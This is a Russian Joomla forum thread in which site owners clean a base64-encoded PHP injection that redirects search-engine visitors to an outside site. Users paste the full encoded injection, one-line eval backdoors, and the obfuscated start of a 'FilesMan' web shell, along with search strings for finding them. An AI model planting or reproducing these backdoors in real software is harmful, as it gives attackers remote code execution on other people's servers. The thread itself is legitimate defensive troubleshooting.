Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 72 Ответов
  • 36421 Просмотров
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
<?php       eval(base64_decode("DQplcnJvcl9yZXBvcnRpbm.........итак символов до 3000 тыс)
и это везде где начинается <?php
если чистить займет уйму времени, может ли сидеть у меня какая функция или бот которая их вставляет как ее найти ( не вручную мне это все ставили )
« Последнее редактирование: 20.01.2012, 01:53:59 от altyn »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
конечно
еще сначала и дверцу поищите для начало через которую вы запустили этого бота
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
не вручную мне это все ставили
Примерно так

Делай бекап распаковывай на компе а дальше Notepad++ или Total Commander как вам удобней

И выложите пожалуйста весь код <?php       eval(base64_decode("DQplcnJvcl9yZXBvcnRpbm.........    Сюда
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
весь код
Цитировать
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="))
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Пока все старое ))
Спойлер
[свернуть]
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Вы уже не первый с этим вирусом. Вычищайте файлы, меняйте пароли. Аналогичные случаи можно найти на форуме.
*

Gazon

  • Захожу иногда
  • 138
  • 7 / 0
  • Образец морали куртуазной
Что-то часто на слуху эта вещица..

Правильно ли я понимаю, что base64_decode - метод шифровки кода и наличие такой надписи в каком-либо файле не означает заражение?

Автор, в ФТП пароли сохраняли?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
2Gazon
опыт в основном показывает или подбор паролей через админку или варьез еще соседние сайты(такое встречается)
*

Gazon

  • Захожу иногда
  • 138
  • 7 / 0
  • Образец морали куртуазной
Админку лучше закрыть ограничением доступа по IP и одной проблемой меньше
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись

Автор, в ФТП пароли сохраняли?
да сохранял каюсь ,  все пароли не запомнить поменял  уже в некоторые админки и зайти сам не могу
Админку лучше закрыть ограничением доступа по IP и одной проблемой меньше
да уж
Вы уже не первый с этим вирусом.
знать бы через какую дыру залезли или все таки по  FTP
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Админку лучше закрыть ограничением доступа по IP и одной проблемой меньше
При чем здесь админка? Здесь доступ к корневой директории сайта нужен.
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

Gazon

  • Захожу иногда
  • 138
  • 7 / 0
  • Образец морали куртуазной
При чем здесь админка? Здесь доступ к корневой директории сайта нужен.

Мой пост - ответ пользователю flyingspook
*

Gazon

  • Захожу иногда
  • 138
  • 7 / 0
  • Образец морали куртуазной
да уж

Да уж или нет, но от вас мы не получили ни версию Joomla, ни список установленных компонентов.
Были ли установлены варезные расширения? Все ли расширения актуальных версий? и т.д. Подобная проблема сегодня повсюду, но ни в одной из тем нет даже намека на версию Joomla. Если версия ниже 1.5.25, то и рассматривать нечего.
« Последнее редактирование: 18.01.2012, 03:31:27 от Gazon »
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
первый саит Joomla 1.5.17 второй 1.5.20
расширении в течении года я не добавлял только тексты
Цитировать
1  FLEXIcontent    Разрешен    1.5.3c stable (r354)    29 June 2010    Emmanuel Danan    
2    ReReplacer    Разрешен    2.7.2    April 2010    NoNumber! (Peter van Westen)    
3    Simply Links    Разрешен    2.0.0    October 2009    UniMatrix xSP    
4    Xmap    Разрешен    1.2.6    2009-12-31    Guillermo Vargas    
5    Banners    Разрешен    1.5.0    April 2006    Joomla! Project    
6    Weblinks    Разрешен    1.5.0    April 2006    Joomla! Project    
7    Newsfeeds    Разрешен    1.5.0    April 2006    Joomla! Project    
8    Polls
Цитировать
1    VirtueMart    Разрешить    1.1.6    21 nov 2010    The VirtueMart Development Team    
2    Xmap    Разрешить    1.2.6    2009-12-31    Guillermo Vargas    
3    Banners    Разрешить    1.5.0    April 2006    Joomla! Project    
4    Weblinks    Разрешить    1.5.0    April 2006    Joomla! Project    
5    Newsfeeds    Разрешить    1.5.0    April 2006    Joomla! Project    
6    Polls    Разрешить    1.5.0    July 2004    Joomla! Project    
код этот подхватил  давно откатиться на бекап нету смысла он и там сохранился

Правильно ли я понимаю, что base64_decode - метод шифровки кода и наличие такой надписи в каком-либо файле не означает заражение?


Одно не могу почему яндексвебмастер сейчас только пометил мои сайты с вредоносным кодом
Яндексвебмастер пишет         Дата последней проверки              Вердикт   
                                                 16.01.2012                             Поведенческий анализ

Именно из варьеза ничего не закачивал, Joomla 1.7.3 качал руссифицированную
« Последнее редактирование: 18.01.2012, 16:17:01 от altyn »
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
Да получилось почистить notepade++ делов на 1 час ( а вот чтобы вспомнить и изучить заново 2 дня потратить )
1 Бекап своего сайта, разархивируйте его
2 Открываем Notepade++ переходим сверху вкладка Поиск/Замена/Найти в файлах/ в строке Найти указываем то что нужно удалить
в строке /Заменить на/ пустым не оставлять,   там же  есть обзор(ищем свою разархивированную папку с содерж сайта),
ставим галочку во всех под папках
3 Нажимаем Заменить в файлах и один раз Ок и ждем долго он ищет минут 20-40
*

ritm-it45

  • Захожу иногда
  • 63
  • 0 / 0
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
идем все сюда
http://www.abroaddesign.com/downloads.html
и качаем
AD Search&Replace
работает очень шустро и без отказно
Цитировать
Да получилось почистить notepade++ делов на 1 час
максимум 5 минут
ищет и заменяет в директориях все файлы
*

icom

  • Давно я тут
  • 830
  • 202 / 4
быстрее этот поиск и замену делать на стороне сервера, а не скачивать бекапы и распаковывать у себя, тем более что сайт после очистки на следующий день может опять "заразится", у моего клиента так, очищал я. Пароли на фтп он не менял пока, я хочу выяснить как происходит заражение (слежу 3 дня), у него 24 сайта на одном аккаунте, заражаются регулярно только три, через что мне казалось что взламывают не через фтп (тем более не через хостера), но в панели хостера оказалось 4 фтп аккаунта, 2 на корневую папку (где видно 24 сайта), 2 на два сайта из трех зараженных.
В этих двух сайтах (на которые есть фтп аккаунты) заражены только index.php и defines.php (в начале <?php       eval(base64_decode("DQplcnJvcl9yZXBvcnRpbm...)
На третьем сайте код eval(base64_decode("DQplcnJvcl9yZXBvcnRpbm... присутствует во всех php файлах, к тому же я нашел "бекдор" в папке images, файл под названием post.php с кодом
Код
<?php eval(base64_decode($_POST["php"])); ?>

для очистки файлов от этой заразы есть php файл, который ищет и удаляет указанный код во всех файлах сайта, кидается в корень и запускается, кому надо могу выложить
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
выкладывай пока не нужен но лишним не будет он жрать не просит
*

icom

  • Давно я тут
  • 830
  • 202 / 4
завтра выложу, адаптирую под общественность немного, нужно добавить форму для ввода искомого текста, а то сейчас его прямо в коде нужно добавлять
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
Код
<?php eval(base64_decode($_POST["php"])); ?>
Блин, спасибо нашел я этот файл он у меня так и остался на сайте
icom , респект
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Блин, спасибо нашел я этот файл он у меня так и остался на сайте
icom , респект
уверен что, и еще много чего
много сюрпризов на ваших сайтах осталось
*

icom

  • Давно я тут
  • 830
  • 202 / 4
вот обещанный скрипт http://cmsdev.org/files/cnt.php?file=replace.zip (новая версия http://secu.ru/scripts/find-and-replace), в архиве файл, кидаете в корень сайта, запускается так - http://example.com/replace.php?pas=joomla, где example.com - адрес вашего сайта)
вчера при помощи его нашел еще пару вредоносных файлов, из 24 сайтов оказалось зараженных 6, а не 3 как я думал (спасибо flyingspook что навел, советую к нему обращаться с подобными проблемами), вот список файлов:

components/com_content/models/index.php - находил во всех 6 сайтах, файл представляет из себя полноценный ftp клиент, со всеми нужными функциями работы с файлами на хостинге, почти тоже самое что oriol показал во втором ответе (shell), тот же файл находился в:
components/com_content/views/archive/tmpl/bloger.php:
components/com_poll/models/index.php:
components/com_user/models/index.php:
components/com_search/models/index.php:

modules/mod_mainmenu/tmpl/index.php:
modules/mod_login/tmpl/index.php:
modules/mod_poll/tmpl/index.php:
modules/mod_footer/tmpl/index.php:
modules/mod_stats/tmpl/index.php:
modules/mod_wrapper/tmpl/index.php:

т.е. или в компонентах или в модулях, и вообще если видите файл index.php в папках components или modules то он там не должен быть 100%

также заодно нашел еще пару файлов на одном из 6 сайтов, т.е. он был "обложен" дважды, разными "кулхацкерами", так как дата создания components/com_content/models/index.php - 28.12.2011, а logs/thumbs.php - 22.07.2010, вот где лежал бекдор нумбер2
cache/thumbs.php:
images/stories/thumbs.php:
logs/thumbs.php:
plugins/system/ping.php:
tmp/thumbs.php:
в этих файлах был следующий код

Код
<?php if(md5($_POST["password"])=="c2725594aaf2c0327abf7d144c3f991c"){eval(base64_decode($_POST["code"]));}?>

нашел я все это через вышеуказанный скрипт, искал по следующим словам
1. "eval(base64_decode" - а также варианты с пробелами между скобок
2. "FilesMan" - с подобного начинался файл шелла, который я нашел на сервере
есть еще много вариаций на поиск "шеллов" и "бекдоров", но мне хватило только этих двух строк, заражений пока не наблюдал (день прошел), обычно код который приводил ТС появлялся в файлах на следующий день после удаления

P.S. Не забывайте после использования скрипта, удалять его с сервера или в коде менять пароль на свой, так как это большая дыра в безопасности, и вообще осторожно что-то заменяйте, (для новичков!) если заменить хоть один символ на другой символ или на "ничего", то сайту кабздец (это и так понятно, но на всякий написал)
« Последнее редактирование: 28.03.2013, 17:35:50 от icom »
*

judenfirst

  • Новичок
  • 1
  • 0 / 0
2. "FilesMan" - с подобного начинался файл шелла, который я нашел на сервере
есть еще много вариаций на поиск "шеллов" и "бекдоров", но мне хватило только этих двух строк, заражений пока не наблюдал (день прошел), обычно код который приводил ТС появлялся в файлах на следующий день после удаления

а как собственно вычислить "файл шелла"??
*

icom

  • Давно я тут
  • 830
  • 202 / 4
у меня код этого самого "шелла" начинался так:

Код
<?php 
$auth_pass = "1ed9b7ceaaaa8042445a85e54940fe75";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKs.....

думаю нужно дописать скрипт, чтоб искал "безпробельные" строки размером более 100-200 символов например, что-то типа MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVn должно быть подозрительно
можно еще искать php-функции работы с файлами, в Joomla они не так часто используются, в шеллах часто, также функция eval не часто используется, а вот "бекдорах" почти всегда (eval в Joomla часто используется JS файлах, если исключить поиск в этих файлах, то вредоносные файлы легко можно найти)
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
eval в Joomla часто используется JS файлах
ни в коем случае нельзя исключать
вы еще не все знаете, Shell может быть и на JS сделан ^-^
*

icom

  • Давно я тут
  • 830
  • 202 / 4
ну не знаю, JS выполняется на стороне клиента, как сделать на нем щелл не представляю, на код бы взглянуть... а исключать нужно, так легче будет разобраться, т.е. сначала пройтись по php файлам, потом все исключить и пройтись только по js файлам, и в них искать уже всякие редиректы на другие страницы, ifram, и подобное
*

Лат

  • Захожу иногда
  • 85
  • 19 / 6
  • Звоните 8 (905) 778-52-44
Скажите пожалуйста, а поиск по регулярным выражениям в Вашем скрипте есть? Если есть, то какие переменные для задания регулярных выражений?
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
icom, спасибо за скрипт! Если Вы не против оставлю заметку у себя на сайте
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

[Решено] Заразились в один день 4 аккаунта по 10 сайтов

Автор Stich SPb

Ответов: 356
Просмотров: 68320
Последний ответ 13.09.2019, 18:49:33
от diana1975
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

Ответов: 5
Просмотров: 1263
Последний ответ 01.03.2018, 22:46:10
от dragon4x4
[Решено] Странный файл в Akeeba Backup - вирус?

Автор jimka

Ответов: 2
Просмотров: 1251
Последний ответ 31.05.2016, 17:39:15
от flyingspook
На сайте появилось перенаправление на нехороший сайт

Автор batot

Ответов: 5
Просмотров: 962
Последний ответ 26.11.2015, 19:34:21
от jlend
Проверка всех файлов на изменения

Автор kik84

Ответов: 8
Просмотров: 2596
Последний ответ 17.03.2015, 13:25:47
от kik84